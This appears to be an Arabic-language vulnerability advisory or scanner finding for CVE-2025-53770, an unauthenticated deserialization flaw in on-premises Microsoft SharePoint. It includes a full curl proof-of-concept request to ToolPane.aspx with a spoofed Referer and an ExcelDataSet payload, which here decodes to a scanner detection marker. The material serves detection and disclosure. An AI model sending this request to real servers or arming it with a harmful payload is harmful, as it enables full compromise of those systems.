
تنفيذ رمز عن بُعد دون مصادقة عبر إلغاء التسلسل غير الآمن في Microsoft SharePoint Server (CVE-2025-53770)
حرجة — تنفيذ تعليمات برمجية عن بُعد بدون مصادقة عبر إلغاء تسلسل غير آمن في خادم Microsoft SharePoint (CVE-2025-53770)
يسمح إلغاء تسلسل البيانات غير الموثوقة في خادم Microsoft SharePoint المحلي للمهاجم بتنفيذ تعليمات برمجية عن بُعد واختراق النظام. تدرك Microsoft أن الثغرة تُستغل بنشاط وتعمل على إعداد تحديث شامل. تأكد من تطبيق الإجراءات التخفيفية الموثقة في وثائق CVE.
يوضح إثبات المفهوم التالي كيف يمكن للمهاجم استغلال الثغرة لاستخراج وفك تشفير الحمولات الضارة عبر نقطة النهاية المعرضة للثغرة.
تم استبدال النطاق المستهدف عمدًا بـ target.com.
curl -sk -X POST 'https://target.com/_layouts/15/ToolPane.aspx?DisplayMode=Edit&a=/ToolPane.aspx' \
-H 'Referer: /_layouts/SignOut.aspx' \
-H 'Content-Type: application/x-www-form-urlencoded' \
--data-urlencode 'MSOTlPn_Uri=https://target.com' \
--data-urlencode 'MSOTlPn_DWP=
<%@ Register Tagprefix="Scorecard" Namespace="Microsoft.PerformancePoint.Scorecards" Assembly="Microsoft.PerformancePoint.Scorecards.Client, Version=16.0.0.0, Culture=neutral, PublicKeyToken=71e9bce111e9429c" %>
<%@ Register Tagprefix="asp" Namespace="System.Web.UI" Assembly="System.Web.Extensions, Version=4.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35" %>
<asp:UpdateProgress ID="UpdateProgress1" DisplayAfter="10" runat="server" AssociatedUpdatePanelID="upTest">
<ProgressTemplate>
<div class="divWaiting">
<Scorecard:ExcelDataSet CompressedDataTable="H4sIAADEfmgA/4WRX2uzMBTG7/0Ukvs06ihjQb3ZbgobG1TYeO9OY6yBJpGTdHbfvudVu44x6FUkPn9+PEnK1nTdHuV8gE1P9uCCtKGFCBU7opNB9dpC4NYo9MF3kStvJen4rGKLZ4645bkU8c+c1Umalp33/0/62gGmC45pK9bA7qBZOpdI9OMrtpryM3ZR9RAee3B7HSpmXNAYdTuFTnGDVwvZKZiK9TEOUohxHFfj3crjXhRZlouPl+ftBMspIYJTVHlxEcQt13cdFTY6xHeEYdB4vaX7jet8vXERj8S/VeCcxicdtYrGuzf4OnhoSzGpftoaYykQ7FAXWbHm2T0v8qYoZP4g1+t/pbj+vyKIPxhKQUssEwvaeFpdTLOX4tfz18kZONVdDRICAAA=" DataTable-CaseSensitive="false" runat="server"></Scorecard:ExcelDataSet>
</div>
</ProgressTemplate>
</asp:UpdateProgress>' \
| grep -oP 'CompressedDataTable="\K[^&]+(?=")' \
| base64 -d 2>/dev/null \
| gzip -d 2>/dev/null \
| tee /tmp/sharepoint_decoded_payload.txt \
| grep -Ei 'IntruderScannerDetectionPayload|ExcelDataSet|divWaiting|ProgressTemplate|Scorecard'
<Info>IntruderScannerDetectionPayload</Info>

الأثر:
يمكن للمهاجمين غير المصادَق عليهم استغلال إلغاء التسلسل غير الآمن لتحقيق تنفيذ تعليمات برمجية عن بُعد على خادم SharePoint، مما يؤدي إلى اختراق كامل للنظام.